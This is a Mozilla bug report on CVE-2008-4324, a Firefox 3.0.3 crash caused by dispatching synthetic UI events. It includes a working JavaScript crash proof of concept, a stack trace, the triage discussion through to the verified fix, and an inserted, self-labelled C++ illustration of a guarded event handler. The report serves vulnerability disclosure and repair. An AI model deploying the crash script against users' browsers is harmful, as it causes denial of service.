Bug 457543 - (CVE-2008-4324) FireFox Crashed, Unhandled User Interface Dispatcher Events

Status: VERIFIED FIXED
Whiteboard: [sg:dupe 454820]
Keywords: verified1.9.0.4
Product: Core
Classification: Components
Component: DOM: Events
Version: 1.9.0 Branch
Platform/OS: All / All
Severity: critical
Assigned To: Nobody; OK to take it and work on it
URL: http://www.milw0rm.com/exploits/6614
Duplicates: 457851
Depends on: 454820
Reported: 2008-09-28 08:18 PDT by Aditya K Sood
Modified: 2008-10-23 15:32 PDT
Flags: dveditz: blocking1.9.0.4+, dveditz: wanted1.8.1.x-

Description Aditya K Sood 2008-09-28 08:18:17 PDT
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13
Build Identifier: Mozilla 3.0.3

Mozilla 3.0.3 crashes with an unhandled exception in User Interface Dispatcher Events. If a user tries to restore the session, the 3.0.3 version still crashes.

Reproducible: Always

Steps to Reproduce:
<script language="JavaScript">
// Create a generic UIEvent (not a KeyEvent) and label it "keypress".
var moz303 = document.createEvent("UIEvents");

moz303.initUIEvent("keypress", true, true, this, 1);
// Dispatch the synthetic event repeatedly at the document element.
for (var moz303_loop = 1; moz303_loop < 10; moz303_loop++)
{
	document.documentElement.dispatchEvent(moz303);
}

// Re-initialise the same event object as a "click" and dispatch it again.
moz303.initUIEvent("click", true, true, this, 1);
for (var moz303_loop = 1; moz303_loop < 10; moz303_loop++)
{
	document.documentElement.dispatchEvent(moz303);
}
</script>

The smaller PoC code.
Actual Results:
Mozilla crashes straight away.

Expected Results:
The software should have handled the exception, with some check presented to the user.

The bug is replicated every time.
Comment 1 David Baron :dbaron: ⌚️UTC-7 (busy September 14-25) 2008-09-28 08:32:33 PDT
I see this on Linux as well, on 3.0 but not on mozilla-central.
Comment 2 Aditya K Sood 2008-09-28 08:45:23 PDT
But it's really hitting 3.0.3 as per the details provided above.

Needs to be fixed.
Comment 3 Daniel Veditz [:dveditz] 2008-09-28 08:54:51 PDT
Also confirming crash in 3.0, does not affect Firefox 2. This looks like a null-deref Denial of Service and could probably be safely unhidden, but I'd like Olli or someone else who knows events to check it out.

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x0000000000000007
Crashed Thread:  0

Thread 0 Crashed:
0   libxpcom_core.dylib           nsTArray_base::Length() const + 11 (nsTArray.h:66)
1   libgklayout.dylib             nsContentUtils::GetAccelKeyCandidates(nsIDOMEvent*, nsTArray<nsShortcutCandidate>&) + 261 (nsContentUtils.cpp:4083)
2   libgklayout.dylib             nsXBLKeyEventHandler::HandleEvent(nsIDOMEvent*) + 159 (nsXBLEventHandler.cpp:173)
3   libgklayout.dylib             nsEventListenerManager::HandleEventSubType(nsListenerStruct*, nsIDOMEventListener*, nsIDOMEvent*, nsISupports*, unsigned int) + 595 (nsEventListenerManager.cpp:1080)
4   libgklayout.dylib             nsEventListenerManager::HandleEvent(nsPresContext*, nsEvent*, nsIDOMEvent**, nsISupports*, unsigned int, nsEventStatus*) + 1119 (nsEventListenerManager.cpp:1186)
5   libgklayout.dylib             nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&, unsigned int) + 396 (nsEventDispatcher.cpp:211)
6   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 714 (nsEventDispatcher.cpp:293)
7   libgklayout.dylib             nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&, unsigned int, nsDispatchingCallback*) + 943 (nsEventDispatcher.cpp:323)
8   libgklayout.dylib             nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*) + 1640 (nsEventDispatcher.cpp:483)
9   libgklayout.dylib             nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) + 350 (nsEventDispatcher.cpp:541)
10  libgklayout.dylib             nsEventListenerManager::DispatchEvent(nsIDOMEvent*, int*) + 274 (nsEventListenerManager.cpp:1310)
  ...etc...
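As an added illustration (not Mozilla's code, and not the fix from bug 454820), the C++ below models the pattern the trace above points at: a key handler that acts on the event's type name and then reads key-event fields that a script-created UIEvent does not carry. The struct layout, names and the tag check are assumptions made for this example; the point is the guard that refuses to downcast on the type name alone and bails out instead of dereferencing memory the smaller struct does not have.

```cpp
#include <algorithm>
#include <cstdint>
#include <string>
#include <vector>

// Model of the pattern in the trace: a DOM event wraps an internal struct and
// only key events carry the char-code table the accel-key search walks; a
// script-created UIEvent can be named "keypress" yet wrap the smaller struct.
enum EventStructType { UI_EVENT, KEY_EVENT };

struct InternalEvent {
    EventStructType structType;
    std::string typeName;  // "keypress", "click", ...
    InternalEvent(EventStructType t, std::string n) : structType(t), typeName(n) {}
};
struct KeyEvent : InternalEvent {
    uint32_t charCode;
    std::vector<uint32_t> alternativeCharCodes;  // shifted/unshifted variants
    KeyEvent(uint32_t c, std::vector<uint32_t> alts)
        : InternalEvent(KEY_EVENT, "keypress"), charCode(c), alternativeCharCodes(alts) {}
};
struct DOMEvent { const InternalEvent* internal; };

// Hardened handler: the type name is not proof of the struct type, so check the
// tag before downcasting and bail out for anything else instead of crashing.
// On success returns true and fills `out` with the unique non-zero candidates.
bool CollectAccelKeyCandidates(const DOMEvent& ev, std::vector<uint32_t>& out) {
    out.clear();
    const InternalEvent* ie = ev.internal;
    if (!ie || ie->typeName != "keypress" || ie->structType != KEY_EVENT)
        return false;  // the PoC's synthetic UIEvent("keypress") lands here
    const KeyEvent* key = static_cast<const KeyEvent*>(ie);  // safe after the check
    auto push = [&out](uint32_t c) {
        if (c != 0 && std::find(out.begin(), out.end(), c) == out.end())
            out.push_back(c);
    };
    push(key->charCode);
    for (uint32_t c : key->alternativeCharCodes) push(c);
    return true;
}

// Constructed inputs: the PoC's UIEvent named "keypress", and a real key press
// of 'a' with its shifted alternative and an empty slot. Returns -1 on bail-out.
int CandidatesFor(bool realKeyEvent) {
    InternalEvent ui(UI_EVENT, "keypress");
    KeyEvent key('a', {'A', 'a', 0});
    DOMEvent ev{realKeyEvent ? static_cast<const InternalEvent*>(&key) : &ui};
    std::vector<uint32_t> out;
    return CollectAccelKeyCandidates(ev, out) ? static_cast<int>(out.size()) : -1;
}
```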
Comment 4 Daniel Veditz [:dveditz] 2008-09-28 08:57:23 PDT
qawanted: would it be possible to figure out a "fix range" on 3.1 nightlies? maybe we can find a patch that fixed this (if it wasn't a "re-write everything" type change).
Comment 5 Olli Pettay [:smaug] (way behind * queues, especially ni? queue) 2008-09-28 09:05:25 PDT
Didn't Mats just fix this or a variant of this?
Comment 6 Olli Pettay [:smaug] (way behind * queues, especially ni? queue) 2008-09-28 09:07:52 PDT
(In reply to comment #5)
> Didn't Mats just fix this or a variant of this?
Bug 454820
Comment 7 Aditya K Sood 2008-09-28 09:17:13 PDT
So what's the actual update? I think I have given the specific version 3.0.3, and the version details are:

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Comment 8 Aditya K Sood 2008-09-28 09:24:34 PDT
Let me know the specifications about the fix.
Comment 9 Olli Pettay [:smaug] (way behind * queues, especially ni? queue) 2008-09-28 09:47:17 PDT
I meant the fix is in the latest nightly builds (feel free to try http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/).
It will be ported to 3.0.x builds.
Comment 10 Aditya K Sood 2008-09-28 10:21:56 PDT
Let me know the specifications about the fix.
Comment 11 Aditya K Sood 2008-09-28 10:22:46 PDT
Last query: when exactly will it be ported to 3.0.x builds?
Comment 12 Daniel Veditz [:dveditz] 2008-09-28 10:33:20 PDT

*** This bug has been marked as a duplicate of bug 454820 ***
Comment 13 Aditya K Sood 2008-09-28 10:43:07 PDT
If it was resolved previously, why is it not ported to the 3.0.3 version?
Comment 14 Aditya K Sood 2008-09-28 10:49:47 PDT
If it was resolved previously, why is it not ported to the 3.0.3 version?
Comment 15 Daniel Veditz [:dveditz] 2008-09-28 15:50:39 PDT
It was found and fixed in our "development" version that will become 3.1; general development does not happen on the 3.0.x branch. This was only fixed a couple of weeks ago (Sept 15) after 3.0.2 was in testing. 3.0.3 was a quick turn-around release to fix a broken password manager and took only that fix.

3.0.4 will be the earliest possible release vehicle for this fix, but the fix needs to be tested to make sure it does not have unintended side effects. Fixing the symptoms turns out to be the easy part, fixing bugs so that they don't cause compatibility problems and break websites is sometimes trickier.
Comment 16 Daniel Veditz [:dveditz] 2008-09-28 15:59:55 PDT
This has been posted to milw0rm:
http://www.milw0rm.com/exploits/6614

I'm going to put the milw0rm reference in the URL field and remove the security flag to forestall duplicate filings.
Original URL was: http://www.secniche.org/moz303
Comment 17 David Baron :dbaron: ⌚️UTC-7 (busy September 14-25) 2008-09-28 20:06:18 PDT

*** This bug has been marked as a duplicate of bug 454820 ***
Comment 18 Daniel Veditz [:dveditz] 2008-09-29 14:04:32 PDT
This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4
Comment 19 Mats Palmgren (:mats) 2008-09-30 16:26:45 PDT
*** Bug 457851 has been marked as a duplicate of this bug. ***
Comment 20 Samuel Sidler (old account; do not CC) 2008-10-02 09:21:56 PDT
(In reply to comment #18)
> This bug is fixed in nightlies by bug 454820, will be fixed in 3.0.4

Adding the fixed1.9.0.4 keyword then. :)
Comment 21 Al Billings [:abillings] 2008-10-23 15:32:04 PDT
This is verified fixed for 1.9.0.4 with Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.4pre) Gecko/2008102304 GranParadiso/3.0.4pre.